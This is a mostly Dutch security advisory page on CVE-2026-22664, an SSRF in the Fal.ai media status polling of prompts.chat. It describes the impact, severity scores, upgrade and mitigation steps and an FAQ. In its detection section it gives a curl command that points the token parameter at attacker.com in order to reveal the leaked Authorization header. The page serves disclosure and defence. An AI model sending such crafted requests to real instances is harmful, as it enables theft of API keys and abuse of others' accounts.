Platform
nodejs
Component
prompts-chat
Opgelost in
30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99
CVE-2026-22664 beschrijft een server-side request forgery (SSRF) kwetsbaarheid in prompts.chat, specifiek in de media status polling functionaliteit van Fal.ai. Deze kwetsbaarheid kan misbruikt worden door geauthenticeerde gebruikers om willekeurige uitgaande verzoeken te initiëren, wat potentieel leidt tot data-exfiltratie en misbruik van de Fal.ai account. De kwetsbaarheid treft versies van prompts.chat tussen 0.0.0 en 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99, maar is verholpen in versie 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99.
Een succesvolle exploitatie van CVE-2026-22664 stelt een geauthenticeerde aanvaller in staat om willekeurige HTTP-verzoeken uit te voeren vanuit de context van de prompts.chat applicatie. Dit kan leiden tot het onthullen van interne diensten en resources die normaal gesproken niet toegankelijk zijn vanaf het publieke internet. De meest directe impact is de mogelijkheid om de FALAPIKEY te stelen, die in de Authorization header wordt meegestuurd. Met deze API-sleutel kan de aanvaller het Fal.ai account van het slachtoffer misbruiken voor diverse doeleinden, waaronder het uitvoeren van aanvallen op interne systemen, het stelen van gevoelige data, of het versturen van spam. De blast radius is afhankelijk van de privileges van het gecompromitteerde Fal.ai account en de toegang die dit account heeft tot andere systemen en data.
Op dit moment (2026-04-03) is er geen vermelding op KEV (CISA Known Exploited Vulnerabilities). De CVSS score is 7.7 (HIGH), wat duidt op een significante kwetsbaarheid. Er zijn geen publieke proof-of-concept exploits bekend, maar de SSRF aard van de kwetsbaarheid maakt het relatief eenvoudig te exploiteren. De publicatie datum van de CVE (2026-04-03) suggereert dat de kwetsbaarheid recent is ontdekt en gepubliceerd.
Organizations utilizing prompts.chat for internal communication or AI-powered chatbot applications are at risk. Specifically, deployments that rely on Fal.ai for media processing or storage are particularly vulnerable. Shared hosting environments where multiple users share the same prompts.chat instance should be carefully assessed, as a compromised account could impact other users.
• nodejs / server: Monitor application logs for outbound requests to unusual or unexpected domains. Use lsof or netstat to identify processes making outbound connections to suspicious IP addresses or ports.
lsof -i | grep prompts.chat• generic web: Use curl to test the media status polling endpoint with a crafted URL containing a known malicious domain. Examine the response headers for any signs of credential leakage.
curl -v 'https://your-prompts-chat-instance/api/media_status?token=https://attacker.com' 2>&1 | grep Authorizationdisclosure
Exploit Status
EPSS
0.03% (9% percentiel)
CISA SSVC
CVSS-vector
De primaire mitigatie voor CVE-2026-22664 is het upgraden van prompts.chat naar versie 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99, waarin de kwetsbaarheid is verholpen. Indien een directe upgrade niet mogelijk is, overweeg dan om de media status polling functionaliteit tijdelijk uit te schakelen, indien dit geen essentiële functionaliteit is. Implementeer strikte URL-validatie en input sanitization op alle parameters die gebruikt worden in de media status polling. Monitor de applicatie logs op verdachte HTTP-verzoeken naar onverwachte bestemmingen. Na de upgrade, controleer de applicatie logs op pogingen tot exploitatie en bevestig dat de FALAPIKEY niet is blootgesteld.
Werk prompts.chat bij naar de versie die commit 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99 bevat. Deze correctie valideert de URLs die worden verstrekt in de token parameter tijdens de media status polling van Fal.ai, waardoor de SSRF kwetsbaarheid wordt gemitigeerd.
Kwetsbaarheidsanalyses en kritieke waarschuwingen direct in uw inbox.
CVE-2026-22664 is a server-side request forgery vulnerability in prompts.chat that allows attackers to disclose sensitive API keys by manipulating URLs.
You are affected if you are using prompts.chat versions prior to 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99.
Upgrade to version 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99 or later. Implement WAF rules to block suspicious outbound requests.
There is currently no confirmed active exploitation, but the vulnerability's potential for credential theft makes it a likely target.
Refer to the prompts.chat release notes and security advisories on their official website or GitHub repository.
Upload je dependency-bestand en kom direct te weten of deze en andere CVEs jou raken.